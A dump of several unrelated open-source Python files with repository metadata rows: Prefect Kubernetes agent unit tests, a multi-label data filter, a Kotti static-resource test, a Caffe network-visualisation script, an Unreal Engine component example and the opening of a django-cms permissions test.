"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Failed"
terminated = MagicMock()
terminated.exit_code = "code"
terminated.message = "message"
terminated.reason = "reason"
terminated.signal = "signal"
c_status = MagicMock()
c_status.state.terminated = terminated
pod.status.container_statuses = [c_status]
pod2 = MagicMock()
pod2.metadata.name = "pod_name"
pod2.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod, pod2]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert core_client.list_namespaced_pod.called
def test_k8s_agent_manage_jobs_reports_empty_status(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
write_run_logs=None,
get_flow_run_state=prefect.engine.state.Success(),
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = True
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Failed"
pod.status.container_statuses = None
pod2 = MagicMock()
pod2.metadata.name = "pod_name"
pod2.status.phase = "Success"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod, pod2]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert core_client.list_namespaced_pod.called
def test_k8s_agent_manage_jobs_client_call(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(data=MagicMock(set_flow_run_state=None))
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = False
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
c_status = MagicMock()
c_status.state.waiting.reason = "ErrImagePull"
pod.status.container_statuses = [c_status]
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
def test_k8s_agent_manage_jobs_continues_on_client_error(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(data=MagicMock(set_flow_run_state=None))
)
client = MagicMock()
client.return_value.graphql = gql_return
client.return_value.set_flow_run_state = MagicMock(side_effect=ClientError)
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = False
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
pod = MagicMock()
pod.metadata.name = "pod_name"
c_status = MagicMock()
c_status.state.waiting.reason = "ErrImagePull"
pod.status.container_statuses = [c_status]
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
core_client.list_namespaced_pod.return_value = list_pods
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
def test_k8s_agent_manage_pending_pods(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, write_run_logs=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
job_mock = MagicMock()
job_mock.metadata.labels = {
"prefect.io/identifier": "id",
"prefect.io/flow_run_id": "fr",
}
job_mock.metadata.name = "my_job"
job_mock.status.failed = False
job_mock.status.succeeded = False
batch_client = MagicMock()
list_job = MagicMock()
list_job.metadata._continue = 0
list_job.items = [job_mock]
batch_client.list_namespaced_job.return_value = list_job
monkeypatch.setattr(
"kubernetes.client.BatchV1Api", MagicMock(return_value=batch_client)
)
dt = pendulum.now()
pod = MagicMock()
pod.metadata.name = "pod_name"
pod.status.phase = "Pending"
event = MagicMock()
event.last_timestamp = dt
event.reason = "reason"
event.message = "message"
core_client = MagicMock()
list_pods = MagicMock()
list_pods.items = [pod]
list_events = MagicMock()
list_events.items = [event]
core_client.list_namespaced_pod.return_value = list_pods
core_client.list_namespaced_event.return_value = list_events
monkeypatch.setattr(
"kubernetes.client.CoreV1Api", MagicMock(return_value=core_client)
)
agent = KubernetesAgent()
agent.manage_jobs()
assert agent.job_pod_event_timestamps["my_job"]["pod_name"] == dt
class TestK8sAgentRunConfig:
def setup(self):
self.agent = KubernetesAgent(
namespace="testing",
)
def read_default_template(self):
from prefect.agent.kubernetes.agent import DEFAULT_JOB_TEMPLATE_PATH
with open(DEFAULT_JOB_TEMPLATE_PATH) as f:
return yaml.safe_load(f)
def build_flow_run(self, config, storage=None, core_version="0.13.0"):
if storage is None:
storage = Local()
return GraphQLResult(
{
"flow": GraphQLResult(
{
"storage": storage.serialize(),
"id": "new_id",
"core_version": core_version,
}
),
"run_config": None if config is None else config.serialize(),
"id": "id",
}
)
@pytest.mark.parametrize("run_config", [None, UniversalRun()])
def test_generate_job_spec_null_or_universal_run_config(self, run_config):
self.agent.generate_job_spec_from_run_config = MagicMock(
wraps=self.agent.generate_job_spec_from_run_config
)
flow_run = self.build_flow_run(run_config)
self.agent.generate_job_spec(flow_run)
assert self.agent.generate_job_spec_from_run_config.called
def test_generate_job_spec_errors_if_non_kubernetesrun_run_config(self):
with pytest.raises(
TypeError,
match="`run_config` of type `LocalRun`, only `KubernetesRun` is supported",
):
self.agent.generate_job_spec(self.build_flow_run(LocalRun()))
def test_generate_job_spec_uses_job_template_provided_in_run_config(self):
template = self.read_default_template()
labels = template.setdefault("metadata", {}).setdefault("labels", {})
labels["TEST"] = "VALUE"
flow_run = self.build_flow_run(KubernetesRun(job_template=template))
job = self.agent.generate_job_spec(flow_run)
assert job["metadata"]["labels"]["TEST"] == "VALUE"
def test_generate_job_spec_uses_job_template_path_provided_in_run_config(
self, tmpdir, monkeypatch
):
path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
labels = template.setdefault("metadata", {}).setdefault("labels", {})
labels["TEST"] = "VALUE"
with open(path, "w") as f:
yaml.safe_dump(template, f)
template_path = f"agent://{path}"
flow_run = self.build_flow_run(KubernetesRun(job_template_path=template_path))
mocked_read_bytes = MagicMock(wraps=read_bytes_from_path)
monkeypatch.setattr(
"prefect.agent.kubernetes.agent.read_bytes_from_path", mocked_read_bytes
)
job = self.agent.generate_job_spec(flow_run)
assert job["metadata"]["labels"]["TEST"] == "VALUE"
assert mocked_read_bytes.call_args[0] == (template_path,)
def test_generate_job_spec_metadata(self, tmpdir):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
job_labels = template.setdefault("metadata", {}).setdefault("labels", {})
pod_labels = (
template["spec"]["template"]
.setdefault("metadata", {})
.setdefault("labels", {})
)
job_labels.update({"JOB_LABEL": "VALUE1"})
pod_labels.update({"POD_LABEL": "VALUE2"})
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
flow_run = self.build_flow_run(KubernetesRun())
job = self.agent.generate_job_spec(flow_run)
identifier = job["metadata"]["labels"]["prefect.io/identifier"]
labels = {
"prefect.io/identifier": identifier,
"prefect.io/flow_run_id": flow_run.id,
"prefect.io/flow_id": flow_run.flow.id,
}
assert job["metadata"]["name"]
assert job["metadata"]["labels"] == dict(JOB_LABEL="VALUE1", **labels)
assert job["spec"]["template"]["metadata"]["labels"] == dict(
POD_LABEL="VALUE2", **labels
)
assert job["spec"]["template"]["spec"]["restartPolicy"] == "Never"
@pytest.mark.parametrize(
"run_config, storage, on_template, expected",
[
(
KubernetesRun(),
Docker(registry_url="test", image_name="name", image_tag="tag"),
None,
"test/name:tag",
),
(
KubernetesRun(),
Docker(registry_url="test", image_name="name", image_tag="tag"),
"default-image",
"test/name:tag",
),
(KubernetesRun(image="myimage"), Local(), None, "myimage"),
(KubernetesRun(image="myimage"), Local(), "default-image", "myimage"),
(KubernetesRun(), Local(), None, "prefecthq/prefect:0.13.0"),
(KubernetesRun(), Local(), "default-image", "default-image"),
],
ids=[
"on-storage",
"on-storage-2",
"on-run_config",
"on-run_config-2",
"on-template",
"default",
],
)
def test_generate_job_spec_image(
self, tmpdir, run_config, storage, on_template, expected
):
if on_template:
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template["spec"]["template"]["spec"]["containers"][0]["image"] = on_template
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
flow_run = self.build_flow_run(run_config, storage)
job = self.agent.generate_job_spec(flow_run)
image = job["spec"]["template"]["spec"]["containers"][0]["image"]
assert image == expected
@pytest.mark.parametrize(
"core_version, expected",
[
("0.12.0", "prefect execute cloud-flow"),
("0.14.0", "prefect execute flow-run"),
],
)
def test_generate_job_spec_container_args(self, core_version, expected):
flow_run = self.build_flow_run(KubernetesRun(), core_version=core_version)
job = self.agent.generate_job_spec(flow_run)
args = job["spec"]["template"]["spec"]["containers"][0]["args"]
assert args == expected.split()
def test_generate_job_spec_environment_variables(self, tmpdir, backend):
"""Check that environment variables are set in precedence order
- CUSTOM1 & CUSTOM2 are set on the template
- CUSTOM2 & CUSTOM3 are set on the agent
- CUSTOM3 & CUSTOM4 are set on the RunConfig
"""
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template_env = template["spec"]["template"]["spec"]["containers"][0].setdefault(
"env", []
)
template_env.extend(
[
{"name": "CUSTOM1", "value": "VALUE1"},
{"name": "CUSTOM2", "value": "VALUE2"},
]
)
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
self.agent.env_vars = {"CUSTOM2": "OVERRIDE2", "CUSTOM3": "VALUE3"}
run_config = KubernetesRun(
image="test-image", env={"CUSTOM3": "OVERRIDE3", "CUSTOM4": "VALUE4"}
)
flow_run = self.build_flow_run(run_config)
job = self.agent.generate_job_spec(flow_run)
env_list = job["spec"]["template"]["spec"]["containers"][0]["env"]
env = {item["name"]: item["value"] for item in env_list}
assert env == {
"PREFECT__BACKEND": backend,
"PREFECT__CLOUD__AGENT__LABELS": "[]",
"PREFECT__CLOUD__API": prefect.config.cloud.api,
"PREFECT__CLOUD__AUTH_TOKEN": prefect.config.cloud.agent.auth_token,
"PREFECT__CLOUD__USE_LOCAL_SECRETS": "false",
"PREFECT__CONTEXT__FLOW_RUN_ID": flow_run.id,
"PREFECT__CONTEXT__FLOW_ID": flow_run.flow.id,
"PREFECT__CONTEXT__IMAGE": "test-image",
"PREFECT__LOGGING__LOG_TO_CLOUD": str(self.agent.log_to_cloud).lower(),
"PREFECT__ENGINE__FLOW_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudFlowRunner",
"PREFECT__ENGINE__TASK_RUNNER__DEFAULT_CLASS": "prefect.engine.cloud.CloudTaskRunner",
"PREFECT__LOGGING__LEVEL": prefect.config.logging.level,
"CUSTOM1": "VALUE1",
"CUSTOM2": "OVERRIDE2", # Agent env-vars override those in template
"CUSTOM3": "OVERRIDE3", # RunConfig env-vars override those on agent and template
"CUSTOM4": "VALUE4",
}
@pytest.mark.parametrize(
"config, agent_env_vars, run_config_env_vars, expected_logging_level",
[
({"logging.level": "DEBUG"}, {}, {}, "DEBUG"),
(
{"logging.level": "DEBUG"},
{"PREFECT__LOGGING__LEVEL": "TEST2"},
{},
"TEST2",
),
(
{"logging.level": "DEBUG"},
{"PREFECT__LOGGING__LEVEL": "TEST2"},
{"PREFECT__LOGGING__LEVEL": "TEST"},
"TEST",
),
],
)
def test_generate_job_spec_prefect_logging_level_environment_variable(
self,
config,
agent_env_vars,
run_config_env_vars,
expected_logging_level,
tmpdir,
backend,
):
"""
Check that PREFECT__LOGGING__LEVEL is set in precedence order
"""
with set_temporary_config(config):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template_env = template["spec"]["template"]["spec"]["containers"][
0
].setdefault("env", [])
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.job_template_path = template_path
self.agent.env_vars = agent_env_vars
run_config = KubernetesRun(image="test-image", env=run_config_env_vars)
flow_run = self.build_flow_run(run_config)
job = self.agent.generate_job_spec(flow_run)
env_list = job["spec"]["template"]["spec"]["containers"][0]["env"]
env = {item["name"]: item["value"] for item in env_list}
assert env["PREFECT__LOGGING__LEVEL"] == expected_logging_level
def test_generate_job_spec_resources(self):
flow_run = self.build_flow_run(
KubernetesRun(
cpu_request=1, cpu_limit=2, memory_request="4G", memory_limit="8G"
)
)
job = self.agent.generate_job_spec(flow_run)
resources = job["spec"]["template"]["spec"]["containers"][0]["resources"]
assert resources == {
"limits": {"cpu": "2", "memory": "8G"},
"requests": {"cpu": "1", "memory": "4G"},
}
def test_generate_job_spec_service_account_name(self, tmpdir):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template["spec"]["template"]["spec"]["serviceAccountName"] = "on-agent-template"
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.service_account_name = "on-agent"
self.agent.job_template_path = template_path
template["spec"]["template"]["spec"][
"serviceAccountName"
] = "on-run-config-template"
run_config = KubernetesRun(
job_template=template, service_account_name="on-run-config"
)
# Check precedence order:
# 1. Explicit on run-config"
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "on-run-config"
# 2. In job template on run-config
run_config.service_account_name = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert (
job["spec"]["template"]["spec"]["serviceAccountName"]
== "on-run-config-template"
)
# None in run-config job template is still used
run_config.job_template["spec"]["template"]["spec"]["serviceAccountName"] = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] is None
# 3. Explicit on agent
# Not present in job template
run_config.job_template["spec"]["template"]["spec"].pop("serviceAccountName")
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "on-agent"
# No job template present
run_config.job_template = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["serviceAccountName"] == "on-agent"
# 4. In job template on agent
self.agent.service_account_name = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert (
job["spec"]["template"]["spec"]["serviceAccountName"] == "on-agent-template"
)
def test_generate_job_spec_image_pull_secrets(self, tmpdir):
template_path = str(tmpdir.join("job.yaml"))
template = self.read_default_template()
template["spec"]["template"]["spec"]["imagePullSecrets"] = [
{"name": "on-agent-template"}
]
with open(template_path, "w") as f:
yaml.safe_dump(template, f)
self.agent.image_pull_secrets = ["on-agent"]
self.agent.job_template_path = template_path
template["spec"]["template"]["spec"]["imagePullSecrets"] = [
{"name": "on-run-config-template"}
]
run_config = KubernetesRun(
job_template=template, image_pull_secrets=["on-run-config"]
)
# Check precedence order:
# 1. Explicit on run-config"
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-run-config"}
]
# 2. In job template on run-config
run_config.image_pull_secrets = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-run-config-template"}
]
# None in run-config job template is still used
run_config.job_template["spec"]["template"]["spec"]["imagePullSecrets"] = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] is None
# 3. Explicit on agent
# Not present in job template
run_config.job_template["spec"]["template"]["spec"].pop("imagePullSecrets")
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-agent"}
]
# No job template present
run_config.job_template = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-agent"}
]
# 4. In job template on agent
self.agent.image_pull_secrets = None
job = self.agent.generate_job_spec(self.build_flow_run(run_config))
assert job["spec"]["template"]["spec"]["imagePullSecrets"] == [
{"name": "on-agent-template"}
]
@pytest.mark.parametrize("image_pull_policy", ["Always", "Never", "IfNotPresent"])
def test_generate_job_spec_sets_image_pull_policy_from_run_config(
self, image_pull_policy
):
template = self.read_default_template()
config = KubernetesRun(
job_template=template, image_pull_policy=image_pull_policy
)
flow_run = self.build_flow_run(config)
job = self.agent.generate_job_spec(flow_run)
assert (
job["spec"]["template"]["spec"]["containers"][0]["imagePullPolicy"]
== image_pull_policy
)
| 34.375738
| 98
| 0.615741
|
c70f98145fb67b09841dceb5edce4bcd3d8a11f8
| 2,188
|
py
|
Python
|
filter_multilabels.py
|
seanliu96/PCHC
|
62acc96a271b56243deabb9418eb39ae3e3710aa
|
[
"MIT"
] | 10
|
2019-03-11T08:40:15.000Z
|
2021-07-11T13:53:44.000Z
|
filter_multilabels.py
|
seanliu96/PCHC
|
62acc96a271b56243deabb9418eb39ae3e3710aa
|
[
"MIT"
] | 3
|
2019-03-10T18:06:32.000Z
|
2019-05-25T06:53:09.000Z
|
filter_multilabels.py
|
seanliu96/PCHC
|
62acc96a271b56243deabb9418eb39ae3e3710aa
|
[
"MIT"
] | 5
|
2019-03-10T17:54:16.000Z
|
2021-11-11T14:30:57.000Z
|
import logging
import logging.config
import logconfig
import os
import settings
from collections import defaultdict, Counter
def filter_multilabels(input_dir):
logger = logging.getLogger(__name__)
logger.info(logconfig.key_log(logconfig.DATA_NAME, input_dir))
paths = []
for file_name in os.listdir(input_dir):
if os.path.splitext(file_name)[-1].startswith('.depth'):
paths.append(os.path.join(input_dir, file_name))
paths.sort()
valid_id_counter = Counter()
for depth in range(len(paths)):
doc_topic_id = defaultdict(lambda: defaultdict(lambda: set())) # doc_topic[i][j] means a set about a document with [doc_text i] and [topic j]
with open(paths[depth], 'r', encoding='utf-8') as f:
line = f.readline()
while line:
line = line.strip()
if line:
line_sp = line.split('\t')
topics = line_sp[2].split(';')
if len(topics) == 2: # an empty str will be at the last
doc_topic_id[line_sp[1]][topics[0]].add(line)
line = f.readline()
with open(paths[depth] + '.filtered', 'w', encoding='utf-8') as f:
for doc, y in doc_topic_id.items():
# multi-label
if len(y) > 1:
continue
for xx, yy in y.items():
# just keep one document
lines = sorted(list(yy))
line = lines[0]
doc_id = line.split('\t', 1)[0]
if depth == 0 or (valid_id_counter[doc_id] & (1 << (depth-1))):
valid_id_counter[doc_id] += (1 << depth)
f.write(line)
f.write('\n')
break
logger.info(logconfig.key_log(logconfig.DEPTH, str(depth)))
if __name__ == '__main__':
log_filename = os.path.join(settings.log_dir, 'filter_multilabels.log')
logconfig.logging.config.dictConfig(logconfig.logging_config_dict('INFO', log_filename))
for input_dir in settings.input_dirs:
filter_multilabels(input_dir)
| 40.518519
| 150
| 0.554388
|
11402c2002d878dc66852399185b09a9c5e0db90
| 779
|
py
|
Python
|
kotti/tests/test_static.py
|
mete0r/Kotti
|
e89103cc57d5d2af8d60eb8208ae9d04c068f6e7
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
kotti/tests/test_static.py
|
mete0r/Kotti
|
e89103cc57d5d2af8d60eb8208ae9d04c068f6e7
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
kotti/tests/test_static.py
|
mete0r/Kotti
|
e89103cc57d5d2af8d60eb8208ae9d04c068f6e7
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
from pytest import raises
class TestStatic:
def test_NeededGroup(self):
from js.deform import deform_js
from kotti.fanstatic import kotti_js
from kotti.fanstatic import NeededGroup
def NeededGroupFactory(resources):
return NeededGroup(resources)
with raises(ValueError):
NeededGroupFactory("foo")
with raises(ValueError):
NeededGroupFactory(["foo", "bar"])
needed = NeededGroup([deform_js, ])
assert needed.resources == [deform_js, ]
needed.add(kotti_js)
assert needed.resources == [deform_js, kotti_js]
def needed_group_adder(resource):
needed.add(resource)
with raises(ValueError):
needed_group_adder(42)
| 23.606061
| 56
| 0.631579
|
828492e836678112bccbcec3ca1abe04502d4364
| 4,698
|
py
|
Python
|
examples/1_H_examples/ucsd_conv_lstm_AE_futurePrediction/network_surgery.py
|
t2mhanh/caffe_anaconda
|
4f31996df63d9148de046d1b54fa1cc4e862ba83
|
[
"BSD-2-Clause"
] | 1
|
2018-11-23T08:45:35.000Z
|
2018-11-23T08:45:35.000Z
|
examples/1_H_examples/ucsd_conv_lstm_AE_futurePrediction/network_surgery.py
|
t2mhanh/caffe_convLSTM_WTA
|
4f31996df63d9148de046d1b54fa1cc4e862ba83
|
[
"BSD-2-Clause"
] | null | null | null |
examples/1_H_examples/ucsd_conv_lstm_AE_futurePrediction/network_surgery.py
|
t2mhanh/caffe_convLSTM_WTA
|
4f31996df63d9148de046d1b54fa1cc4e862ba83
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
caffe_root = '/home/csunix/schtmt/NewFolder/caffe_May2017_PythonLayer/'
sys.path.insert(0,caffe_root + 'python')
import numpy as np
import h5py
import matplotlib.pyplot as plt
import caffe
from matplotlib.backends.backend_pdf import PdfPages
def H_visualize_weights(net, layer_name, padding=4, filename=''):
# follow the method of "display_network.m"
# The parameters are a list of [weights, biases]
data = np.copy(net.params[layer_name][0].data)
# N is the total number of convolutions
N = data.shape[0] * data.shape[1]
print N
print data.shape
# a = data[1,0,:,:]
# print abs(a).min()
# Ensure the resulting image is square
filters_per_row = int(np.ceil(np.sqrt(N)))
# Assume the filters are square
filter_size = data.shape[2]
# Size of the result image including padding
result_size = filters_per_row * (filter_size + padding) - padding
# Initialize result image to all zeros
result = np.ones((result_size, result_size))
# Tile the filters into the result image
filter_x = 0
filter_y = 0
for n in range(data.shape[0]):
for c in range(data.shape[1]):
if filter_x == filters_per_row:
filter_y += 1
filter_x = 0
# for i in range(filter_size):
# for j in range(filter_size):
# result[filter_y * (filter_size + padding) + i, filter_x * (filter_size + padding) + j] = data[
# n, c, i, j]
result_temp = data[n,c,:,:]
clim = abs(result_temp).max()
result[filter_y * (filter_size + padding):filter_y * (filter_size + padding) + filter_size,
filter_x * (filter_size + padding):filter_x * (filter_size + padding) + filter_size] = data[n,c,:,:]/clim
filter_x += 1
print result.shape
# # Normalize image to 0-1
# min = result.min()
# max = result.max()
# result = (result - min) / (max - min)
# Plot figure
plt.figure(figsize=(10, 10))
plt.axis('off')
plt.imshow(result, cmap='gray', interpolation='nearest')
# Save plot if filename is set
if filename != '':
plt.savefig(filename, bbox_inches='tight', pad_inches=0)
plt.show()
def show_activation(net,blob_name):
# net.forward()
data = np.copy(net.blobs[blob_name].data)
print np.shape(data)
acti_min, acti_max = data.min(), data.max()
plt.figure()
for n in range(np.shape(data)[0]):
plt.axis('off')
plt.imshow(data[n,0,0,:,:],vmin=acti_min, vmax=acti_max,cmap='gray')
plt.savefig('testData'+blob_name+str(n), bbox_inches='tight', pad_inches=0)
#-----------------------------------------------------------------------------------------------------------------------
caffe.set_mode_cpu()
# caffe.set_mode_gpu()
model_def = caffe_root + 'examples/1_H_examples/UCSD_conv_lstm/ucsd_wta_autoencoder3_test.prototxt'
# model_weights = caffe_root + 'examples/1_H_examples/conv_lstm_autoencoder/conv_lstm_relu_AE_iter_20000.caffemodel' # ERROR > 50
model_weights = '/usr/not-backed-up/1_convlstm/ucsd_rmsProp/wta_autoencoder_iter_120000.caffemodel' #ERROR = 0.1088
# Load model
net = caffe.Net(model_def,model_weights, caffe.TEST)
print("blobs {}\nparams {}".format(net.blobs.keys(), net.params.keys()))
print [(k, i, p.data.shape) for k in net.params for i, p in enumerate(net.params[k])]
# w = np.copy(net.params['deconv'][0].data)
w = np.copy(net.params['conv1'][0].data)
h5f = h5py.File(save_path+'USCDpatch48_'+str(i+1)+'.h5','w')
h5f.create_dataset('input',shape =np.shape(input), dtype=float32)
h5f['input'][:] = input
h5f.close()
print np.shape(w)
plt.figure()
plt.imshow(w[0,0,:,:])
plt.axis('off')
plt.show()
# print([(k, v[0].data.shape) for k, v in net.params.items()])
# print "Total number of parameters: " + str(sum([prod(v[0].data.shape) for k, v in net.params.items()]))
# # visualize_weights(net, 'deconv', filename='deconv_batchSize2.png')
# # H_visualize_weights(net, 'deconv', filename='deconv_MatlabDisplay_batchSize2.png')
# h5f = h5py.File('/usr/not-backed-up/1_convlstm/bouncing_mnist_test_AE.h5','r')
# data = h5f['input'][:]
# h5f.close()
# # # print np.shape(data)
# data1 = data[0,:,:,:]
# data1 = np.reshape(data1,(1,10,64,64))
# # print np.shape(data1)
#
# # a = np.copy(net.blobs['input'].data)
# # print np.shape(a)
# net.blobs['input'].reshape(*data1.shape)
# net.blobs['input'].data[...] = data1
# net.blobs['match'].reshape(*data1.shape)
# net.blobs['match'].data[...] = data1
# net.forward()
# myloss = np.copy(net.blobs['l2_error'].data)
# print myloss
# show_activation(net,'match_p_r')
# show_activation(net,'output')
| 38.826446
| 129
| 0.635802
|
6b021b41076e5fc9c8138408a2cfba6906ae6a56
| 447
|
py
|
Python
|
examples/register_new_native_component.py
|
avivazran/UnrealEnginePython
|
758ad1e5b3a871442d00bdc3144e246fa443098f
|
[
"MIT"
] | 2,350
|
2016-08-08T17:00:16.000Z
|
2022-03-31T22:37:15.000Z
|
examples/register_new_native_component.py
|
avivazran/UnrealEnginePython
|
758ad1e5b3a871442d00bdc3144e246fa443098f
|
[
"MIT"
] | 820
|
2016-08-08T16:35:26.000Z
|
2022-03-24T05:09:51.000Z
|
examples/register_new_native_component.py
|
avivazran/UnrealEnginePython
|
758ad1e5b3a871442d00bdc3144e246fa443098f
|
[
"MIT"
] | 658
|
2016-08-10T16:26:24.000Z
|
2022-03-30T02:42:22.000Z
|
import unreal_engine as ue
from unreal_engine.classes import ActorComponent
class FooComponent(ActorComponent):
def __init__(self):
ue.log('Ctor')
def DoSomething():
ue.print_string('TEST !!!')
FooComponent.set_metadata('BlueprintType', 'true')
FooComponent.set_metadata('BlueprintSpawnableComponent', 'true')
FooComponent.set_metadata('IsBlueprintBase', 'true')
FooComponent.component_type_registry_invalidate_class()
| 27.9375
| 64
| 0.771812
|
6c7d52943c0c4ea8c4fd137d01a4284f85b69fd8
| 51,194
|
py
|
Python
|
cms/tests/test_permmod.py
|
Qurus/django-cms
|
77f41ce69132b6103e147343d7cbb7fca6265bf1
|
[
"BSD-3-Clause"
] | null | null | null |
cms/tests/test_permmod.py
|
Qurus/django-cms
|
77f41ce69132b6103e147343d7cbb7fca6265bf1
|
[
"BSD-3-Clause"
] | null | null | null |
cms/tests/test_permmod.py
|
Qurus/django-cms
|
77f41ce69132b6103e147343d7cbb7fca6265bf1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import with_statement
from djangocms_text_ckeditor.models import Text
from django.contrib.admin.sites import site
try:
from django.contrib.admin.utils import unquote
except ImportError:
from django.contrib.admin.util import unquote
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser, Group, Permission
from django.contrib.sites.models import Site
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.test.client import RequestFactory
from django.test.utils import override_settings
from cms.api import (add_plugin, assign_user_to_page, create_page,
create_page_user, publish_page)
from cms.admin.forms import save_permissions
from cms.cms_menus import get_visible_pages
from cms.constants import PUBLISHER_STATE_PENDING
from cms.management.commands.subcommands.moderator import log
from cms.models import Page, CMSPlugin, Title, ACCESS_PAGE
from cms.models.permissionmodels import (ACCESS_DESCENDANTS,
ACCESS_PAGE_AND_DESCENDANTS,
PagePermission,
GlobalPagePermission)
from cms.plugin_pool import plugin_pool
from cms.test_utils.testcases import (URL_CMS_PAGE_ADD, URL_CMS_PLUGIN_REMOVE,
URL_CMS_PLUGIN_ADD, CMSTestCase)
from cms.test_utils.util.context_managers import disable_logger
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils.i18n import force_language
from cms.utils.page_resolver import get_page_from_path
from cms.utils.permissions import (has_page_add_permission,
has_page_change_permission,
has_generic_permission)
def fake_tree_attrs(page):
page.depth = 1
page.path = '0001'
page.numchild = 0
@override_settings(CMS_PERMISSION=True)
class PermissionModeratorTests(CMSTestCase):
"""Permissions and moderator together
Fixtures contains 3 users and 1 published page and some other stuff
Users:
1. `super`: superuser
